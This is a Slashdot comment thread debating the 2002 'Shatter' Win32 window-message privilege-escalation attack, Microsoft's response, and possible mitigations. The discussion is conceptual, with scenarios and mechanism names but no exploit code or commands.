Even if M$ could take all of its employees off the Office, X-Box, and every other project, and put them to work on a new OS, it would be months before it could be released, and more months before there were any applications for it.
Microsoft isn't stupid. Even they know the best way to kill a project is to put too many people on it. The solution to your supposed problem (it's not as bad as everyone here hopes, and does not require Microsoft to write a new OS from scratch) would be to put together a cross-functional team to develop a new OS architecture, then spec the new APIs for that new OS. Then you bring in the Office guys, and have them write a version of Office for the new APIs, while you have the Windows guys (or whoever) write the new OS. But it'll never happen, because there's no need to do it.

Microsoft has had 7 years of warning. (2, Offtopic)

Quasar1999 (520073) | more than 11 years ago | (#4020574)

Microsoft was told about this flaw when it was first discovered 7 years ago. They still haven't fixed it.

In other news, microsoft is sueing the cnet for making a flaw public news. They claim they needed more time to fix it, 7 years just isn't enough time to fix the bug and test the patch...

Is this really a security risk? (0, Troll)

turbine216 (458014) | more than 11 years ago | (#4020577)

This whole exploit seems flawed in its assumptions...I mean, how can it be classified as a security risk of ANY sort if it requires that someone is sitting in front of the computer? It seems like this is something that could easily (EASILY) be avoided by - wait for it - preventing unauthorized access! Something that Windows has been doing pretty well since Windows 2000 (flame on, zealots, but it's true).

Sounds like this guy is just trying to gain cool-guy points with the slashbot crowd by showing off his 1337 windoze hacking skillz. Pass.

Re:Is this really a security risk? (2)

Marx_Mrvelous (532372) | more than 11 years ago | (#4020621)

This is a huge risk. As any security administrator knows, more security breaches come from within a computer network than from without. Even if computers are locked in a computer room, what about the desktop machines? We currently use profiles to prevent people from installing unlicensed software. But with this exploit, that probably would not be very hard. This is a huge problem in Windows.

Re:Is this really a security risk? (1)

turbine216 (458014) | more than 11 years ago | (#4020676)

A user's ability to crash his or her desktop machine does NOT constitute a HUGE risk, as you put it (especially when considering that it requires binary/hex editors and various other obscure tools that your typical user just doesn't have).

And any competent netadmin/sysadmin will make sure that those same users don't have the ability to run arbitrary code on a server.

I agree that this is a serious flaw in MS's design, but christ, aren't you blowing it just a BIT out of proportion? Seriously...can you think of a single situation where this would ACTUALLY create a real security risk?

Re:Is this really a security risk? (1)

Ardax (46430) | more than 11 years ago | (#4020716)

Policies? I remember a handy little program that would reset a system's policies and prevent them from being pulled from the server at next boot.

I've probably still got it sitting on my hard drive somewhere. I don't know if this will still work XP, or even 2k. Should I ever get the opportunity again, I might check. :)

Re:Is this really a security risk? (1)

jasonrfink (193522) | more than 11 years ago | (#4020646)

Terminal access and shared access to a server can be used to perform the same attack on a server from a client. If the Shatter attack is as easy as he makes it out to be, practically anyone could do it within the company fence, for those who install ms on the wire I am not sure what attacks could be performed. If a system on the wire has shares activated or terminal services running, it is only a matter of time before they can use this attack.

Re:Is this really a security risk? (5, Insightful)

topham (32406) | more than 11 years ago | (#4020648)

A user opens a damn attachment, which you've told them not to do a hundred times, but one of them does it anyway...

No problem right, the attachment runs as that user and the damage is restricted? Only it isn't, because the attachment escalates itself to localsystem privledge and now starts really screwing around.

With any luck it drops itself on the network somewhere and some other soul mistakenly runs it and it gets domain privledges...

Re:Is this really a security risk? (0)

Anonymous Coward | more than 11 years ago | (#4020659)

Did you read the fuckin article you troll?? He said he did it to a remote computer from far away. You just need access to the computer, not physical access, but a user account on the computer. Like he says at the end, this could be really bad for large corporations of people. Or any place that lets employees connect from home. Just a friendly reminder to read the linked article before you post. fuckin douche handle

Re:Is this really a security risk? (2)

sysadmn (29788) | more than 11 years ago | (#4020666)

Read the article. This is an escalation-of-privileges attack. Very few businesses give every user 'root' on their desktop. Now Microsoft has done it for them.

Re:Is this really a security risk? (1)

RetroGeek (206522) | more than 11 years ago | (#4020674)

Scenario:

- I am a user on a corporate machine. I have very basic access to the machine, ie: I cannot install s/w that requires admin access.

- I install a utility that does not require admin access.

- The utility runs, but in the background raises MY access to 'local System' (read root), using this exploit.

- Now that utility can do anything it wants.

It's the equivalent of a Linux user gaining root access simply by running an app.

Re:Is this really a security risk? (2)

Slynkie (18861) | more than 11 years ago | (#4020675)

The fact that it may require an attacker to be physically in front of the computer is the -point-. As others have mentioned, it's a matter of being assigned a certain (low) level of access, and giving yourself a higher level. Sort of equivalent to a local root exploit under un*x.

Think of the "Family Computer". Mom + dad put some content blocking software on it in order to block their son/daughter from accessing some particular type of content on the web. Mom + dad also install, to use the example from the white paper, anti-virus software.

Little billy logs in as himself, uses the shatter exploit to give himself admin privledges, and disables the content blocker.

At least, that's the way I understood it...

(btw, if it was me 15 years ago, I'd probably lock out mom + dad's accounts just for kicks, but that's besides the point.)

Re:Is this really a security risk? (1)

Ardax (46430) | more than 11 years ago | (#4020689)

It doesn't really require someone to be sitting at the console.

Socially engineer yourself a login and hijack the machine remotely via Terminal Services (or Remote Desktop Connection, which is ENABLED by default in XP). Owie.

Yes, clueful sysadmins or netadmins will make sure that port 3389 (IIRC) is firewalled, but there's lots of admins that are either not clueful or overrided by a PHB.

Don't believe me? Check with a sysadmin running a web server. Ask them how many Code Red or Nimda hits they still get per hour.

Re:Is this really a security risk? (0)

Anonymous Coward | more than 11 years ago | (#4020703)

just about every day, i see hundreds of students sitting in front of my university's Win2000 network in the student computer labs... its kinda hard to limit the authorized access...

think harder next time, the whole world doesn't revolve around your setup...;)

Re:Is this really a security risk? (0)

Anonymous Coward | more than 11 years ago | (#4020715)

The main security hole IMO is that programs can be written to simulate users for other applications. For example, I once used a program which had thousands of phone numbers stored in its encrypted databases. The program would only allow 50 or so numbers pulled at a time through a fairly tedious process (so that people couldn't simply rip the database off of the CD). By writing a program to automate this process (which is a trivial exercise to do in Windows), the entire database could be copied painlessly, thereby defeating their simple security protection.

Re:Is this really a security risk? (2)

Abcd1234 (188840) | more than 11 years ago | (#4020723)

Bull. Local exploits are just as important to avoid as remote ones. Anyone who thinks otherwise has their head in the sand. Ignoring the proliferation of remote exploits on the Windows platform, the fact is, people want to run multiuser systems on Windows-based networks (why do you think Microsoft rolled TS into their main product line? To promote this very thing!) And the minute you start allowing multiuser access like this, local exploits become a real concern. Imagine you're running a University using TS and a bunch of thin clients, and you happen to have a cracker enrolled in your program? The point is, in this sort of environment, you CAN'T trust the user, and so you can't take the chance that a local exploit could leave you vulnerable.

Hmm that gives me an idea... (1)

jsonmez (544764) | more than 11 years ago | (#4020579)

That means I essentially could write a version of paint that when you open it closes all other windows you have open on your system and flashes up a window that says "PAY YOUR ALLEGANCE TO PAINT ALONE!"

Fixability (4, Interesting)

Wrexen (151642) | more than 11 years ago | (#4020580)

What's to prevent an administrator from installing a Message Hook [microsoft.com] that eats all EN_* or WM_TIMER messages sent between processes? Since your DLL would be living in each process space, you could detect inter-process message sending and block the attack from ever leaving the Shatter process. I don't see any reason why this shouldn't work

Re:Fixability (4, Insightful)

erasmus_ (119185) | more than 11 years ago | (#4020663)

Finally, a constructive response to the problem. However, since you still don't have the capability of seeing what the source of the message is, I don't see how you can drop all of those messages with 100% certainty. Those API calls are there and are used legitimately as well, for better or for worse. So although your way coulf fix things, I wouldn't be surprised to see it breaking some applications along with it.

Re:Fixability (1)

hyperstation (185147) | more than 11 years ago | (#4020718)

cut and paste wouldn't be very useful then, would it? i don't know much about win32 api, just assuming here...

SD3, eh? Sounds suspicious. (2)

mbourgon (186257) | more than 11 years ago | (#4020587)

[Scott Charney, Microsoft]
We're doing this thing called "Trustworthy Computing." It's an evolving concept. We've come up with our new paradigm, SD3[...]

A-ha! It's just a small leap to go from SD-3 to SD-6. Insert joke about covert evil organizations here.

Yes, it's funny. Laugh.

9/11 related Easter Egg on orbitz.com (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020588)

OMG!! Go to Orbitz.com [orbitz.com] and use their OrBot to book a flight from BOS to LAX on 9/11.

Re:9/11 related Easter Egg on orbitz.com (0)

Anonymous Coward | more than 11 years ago | (#4020695)

hmm. where? i don't see it.

Read the BugTraq replies first (4, Informative)

pbemfun (265334) | more than 11 years ago | (#4020589)

Before jumping to conclusions, read the reply to the "vulnerabilities" on the BugTraq mailing list here [securityfocus.com] . Doesn't look like its something unknown to the public and its really more of a vendor problem, not MS one.

Devil's Advocate... (2, Interesting)

d_force (249909) | more than 11 years ago | (#4020590)

It seems this exploit allows local users to escalate their privelages through processes running as LocalSystem. So, I could either do this or open up the system, take out the hard drive, re-write the OS, and put the drive back in the system. Yes, these problems do exist when you're forced to trust local users.

Simple fix: require each user to wear a straightjacket with their legs and arms bound to the chair; have them type via the mouth-to-pencil-to-keyboard method.

Re:Devil's Advocate... (0)

Anonymous Coward | more than 11 years ago | (#4020624)

But with Windows's Remote Desktop, anyone can be a local user.

Re:Devil's Advocate... (2, Insightful)

Algorithm wrangler (455855) | more than 11 years ago | (#4020671)

But as long as M$ allows E-Mail clients and even Media Players to execute random code at will, the "local user" is a matter of definition.

Re:Devil's Advocate... (1)

mark_lybarger (199098) | more than 11 years ago | (#4020683)

there's a reason you don't allow normal users to have administrator (root) access. among the many others, you just don't want them to fsck up the system beyond unbelief.

on a side note, why do you need to remove the drive to write an os to it???

Don't Do That (3, Insightful)

cperciva (102828) | more than 11 years ago | (#4020593)

This "vulnerability" only effects poorly-written applications, running with system priviledges, which create windows in user-space.

You're not supposed to do that.

If you want to have a service which is user-configurable, create two separate programs (one service & one gui) and communicate via a named pipe.

This isn't a flaw in the win32 API. This is a flaw in some applications which run under windows.

Re:Don't Do That (0)

Anonymous Coward | more than 11 years ago | (#4020710)

What's really funny is that this is the best comment I've seen, and someone modded it "overrated".

What about *other* resources? (2)

Tablizer (95088) | more than 11 years ago | (#4020594)

GUI Windows are only part of the problem. Ideally, one should be able to limit the sections of disk and RAM that are used, and also how much disk and RAM are used.

Why fuss about just the GUI? There is more to applications and security than GUI's.

(It would be easier to clean off old apps if we could limit their installation range.)

No kidding (0)

Anonymous Coward | more than 11 years ago | (#4020605)

With the gettext, sendmessage, memory and various other api calls you can do just about anything to other programs.

Then if you care to fire up your favorite hex editor...

Java? (0)

Anonymous Coward | more than 11 years ago | (#4020616)

i looked at the paper and i couldn't figure out what the opportunity for remote exploit is... can it be done from java? .NET? jscript? other network software?

Could be useful for the EverQuest-autobot crowd... (0)

Anonymous Coward | more than 11 years ago | (#4020617)

Seems like it could be useful for the autobot gaming crowd... EverQuest is certainly simple enough to automate...

Evolving Concepts at Microsoft are Frightening (5, Funny)

guttentag (313541) | more than 11 years ago | (#4020637)

We're doing this thing called "Trustworthy Computing." It's an evolving concept.
It starts out meaning "We are worthy of your trust."

Then it evolves to mean "You trust us."

Then it evolves to mean "You trust only us."

Then it evolves to mean "All your base are belong to us."

Shouldn't Effect Network Security (1)

zapf (119998) | more than 11 years ago | (#4020638)

No one should be allowed console access to a server, and localsystem can't be used (unless there's another exploit) to take over other computers on a domain. Granted, someone could mess up a public computer at a library or whatever, but they couldn't mess up win32 boxes enmasse because they don't have escalated network privilages, just local system ones.
Also, most individual users log into their computers as Administrator and thus make themselves vulnerable to virii anyways. Even with corporate spying this wouldn't be a very effective exploit. Company A sends a trojan to a designer at Company B. The trojan would run as the designer, who has access to all of his files anyways. There's no need to escalate privilages on the local machine!

Anyways, I'm not trying to say it's not a flaw. It is. It's just not the Computer Apocalypse.

There is advantages... (3, Interesting)

FortKnox (169099) | more than 11 years ago | (#4020657)

Having a message-hook has a great advantage side effect.
You can make a program that can take any window on your screen, study it, and use it. Imagine the testing possibilites. I think WinRunner and Rational Robot both use message hooks in order to run their regression testing utilities.

Is there anything like that in linux? AskSlashdot [slashdot.org] encountered someone trying to find this...

the basic problem (3, Interesting)

jafac (1449) | more than 11 years ago | (#4020661)

Okay, here's the problem, spotted it in like the first response of the CNET article:

Q: I understand security was not your original calling, so to speak.

A: I'm a lawyer by training, so I'm a little bit like a fish out of water, although I'm more technical than most lawyers. I started my career as a prosecutor in Bronx County, New York. Then I joined the feds and went to Honolulu for three years. So, I haven't exactly had the normal career path. But it's been a very interesting ride.

So what exactly qualifies this guy to be a security guru, let alone THE HEAD of security at the software company that sells the most widely used OS on the planet?

If you ask me, I find that frightening.

I've said it here before a zillion times over the years and I'll say it again. Nearly every problem in the software industry today can be traced back to handing over an engineer's job to a non-engineer.

True- if you take a company of nothing but engineers, you'll have a product nobody understands how to use, and nobody can sell. But if you have a company of nothing but MBA's and Lawyers, you have a company that sells nothing but a lot of vapor and hype. This is the personification of Microsoft.

As a side note (0)

Anonymous Coward | more than 11 years ago | (#4020664)

If you have local access to any box running a third party app that requires local root privileges, and it allows the local user to pass code to it, you can get root.

The CNET article also amusing...laywers... (0)

Anonymous Coward | more than 11 years ago | (#4020668)

Hmm...the idea of a lawyer being "promoted" into a security expert sounds like they will use "secruity" thru the legal system rather than actually fixing things...

Solaris x86 (1)

ccoder (468480) | more than 11 years ago | (#4020669)

Too bad Sun Microsystems stopped developing the x86 version of Solaris.... (not that it widely used). Maybe this will convince more software developers like Peoplesoft, Oracle, etc to KEEP developing code in other SECURE platforms - not ones that claim to be.

Microsoft's Reply (1)

mgibbs (548224) | more than 11 years ago | (#4020677)

...seems like a fair assessment of the situation.

If someone is running arbitrary programs on my Windows machine, I'm probably not going to be as worried about privilege escalation as I am about someone running arbitrary programs on my Windows machine.

Microsoft's reply can be found here: http://security.tombom.co.uk/response.txt [tombom.co.uk] .

--Matt

SlashSnot (0)

Anonymous Coward | more than 11 years ago | (#4020679)

MicroSnot Winbloze has insecure code, i seen it, the code is made full of holes put there on purpose to give it more compatibility between applications thats why its "so easy to use no wonder its number 1" (the AOL of OSs)

if you seen what i seen you would abandon it like a smelly whore it is...

Local access...?? (0)

Anonymous Coward | more than 11 years ago | (#4020680)

When Microsoft saw a copy of this paper, they sent me a response stating clearly that they are aware of these attacks, and they do not class them as vulnerabilities. I believe that this point of view is incorrect. The two reasons that Microsoft stated are that a) They require unrestricted physical access to your computer, or b) they require you to run some kind of malicious code on your machine.

Um, great.

I've never coded for win32-- only MacOS and UNIX-- but, i have two questions.
  • What about Terminal Server? The implication here seems to be that if you allow anyone to access your machine via terminal server, any security restrictions you've set on them is voluntary from their standpoint.
  • The trick seems to involve the win32 APIs, and tricking other win32 programs with higher priviliges into executing unprivilidged code. Must, though, the program be GUI or graphically launched in order to use this exploit? Specifically, can it be CLI? Can it be a local program-- for example default.ida-- that has been compromised?
  • I thought Win2000 has protected memory? Shouldn't that halt at least some of this? No?
  • Doesn't the NSA demand at least a certain level of security separation within their OS-- like, they demand that if one program is compromised the others can't be touched even if they're being run by the same user. Thus this "SecureLinux" stuff. Doesn't this all mean the NSA can't use NT now?
I keep thinking i've misunderstood this somehow. That Microsoft is claiming it isn't a problem that the security separations within the OS don't apply as long as you can run an application... that just seems completely unreal. Am i to understand that any program can get code to execute as Administrator? I must be misunderstanding this, somehow. I can't imagine even they could get away with something like that. I remember what a fiasco and embarrasment it was for the linux community awhile back when the linux kernel was found to have that privilidge escalation bug; the linux developers seemed to treat that like the end of the world. And MS seems to think that the same thing is not a concern because "you have to have physical access"?? Yeah, physical access usually equals root anyway, but haven't these people ever heard of a school computer lab?? Or a public library??

BTW, there's another good discussion on this subject currently working its way through the kuro5hin edit queue, if you wanna pop over there and check on it.

window messages a privilege boundary? (5, Informative)

weld (4477) | more than 11 years ago | (#4020682)

Where is it documented that windows provides a privilege boundary at the message interface? There is none. The example application was poorly designed.

An application that needs to provide a window interface to the user should do so through another process running as the user and not system. That process should then communicate to the higher privileged process using a mechanism such as COM or named pipes.

A similar problem was found by Dildog quite a while ago, "NetDDE Message Vulnerability":
http://www.atstake.com/research/a dvisories/2001/a0 20501-1.txt

The method of exploit described in Shatter is new: putting shellcode into memory through edit controls and then using timer messages. But the fundemental problem is not a new class of problem. It is with the application's design not windows.

-weld

NetCafs surrender... (0)

Anonymous Coward | more than 11 years ago | (#4020686)

Meanwhile, does OS X have the same problem?

sandboxes, java native api, .net, etc...? (0)

Anonymous Coward | more than 11 years ago | (#4020690)

I wonder, since this is an api exploit, if one can use it from a java or c# applet by calling win32 api native methods?

At the end of the article... (2)

Spackler (223562) | more than 11 years ago | (#4020697)

This is a good thing because it can eliminate a lot of viruses. So if you get code and it's not from anyone you trust, you can choose to not run it.

So, can I take this to mean that windows has finally added chmod?

Do you people read? (3, Insightful)

Ryan_Terry (444764) | more than 11 years ago | (#4020705)

--Flaimbait--

I'm sorry, and I hate to be a stickler, but did you people even read part of the article?

The e-mail he recieved outlines where the danger lise, and also outlines the fact that this is not necessarily an MS problem but a vendor related issue. I am very pro-linux, and I will support it till I die, but this blatent MS bashing makes linux users look like morons.

Just for once I wish people would read the articles before the "M$ Sux0rs, I will 0wne any M$ Boxen" jibberish begins...

two points (2)

Lord Omlette (124579) | more than 11 years ago | (#4020721)

1. The WM_TIMER thing is slick, very cute. At least to my stupid and uneducated mind anyway *cough*
2. The whole exploiting a buffer overrun in an edit box of a non-Microsoft app just goes to show that you should be coding defensively EVERYWHERE, not just in network code.

wow, what a moron (0)

Anonymous Coward | more than 11 years ago | (#4020722)

if you want to secure windows from a client(who shouldn't be doing anything to exploit the system in the first place) then you just make it so they have restricted software access, not hard to do.., and btw, this bug won't let ppl take control of everything, just the things w/ an hwnd, and then not even access to vars and things, just drawing props...next retard please..

It's not even this hard (3, Insightful)

leshert (40509) | more than 11 years ago | (#4020731)

If you have physical access to the box, there are n ways to get your code executed in a Windows app. WM_TIMER (the callback version) is one, as are window hooking, CBT hooks (computer-based-training, although I've never seen it used for this purpose) forcible DLL loading (if you have access to the Registry), debug process attachment, CreateRemoteThread, thunking well-known DLLs (which is why Red Alert 1 won't play on Win2K without a patch--they can't thunk kernel32), etc., etc., etc.

Windows programmers have been using these methods for non-evil reasons for many years--the "3D look" of MS Office apps before Windows 95 was done this way.

The insecurity of the desktop model for Windows shouldn't surprise anyone. It wasn't designed to be secure OR multi-user, and patching after the fact doesn't make it so. It's comparable to complaining that telnet and ftp send passwords in clear text. Well, no kidding, they weren't designed to be secure, so they're not.

And like the case of telnet, making a secure but still 100% backwards compatible solution is pretty much impossible, as the article states.
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...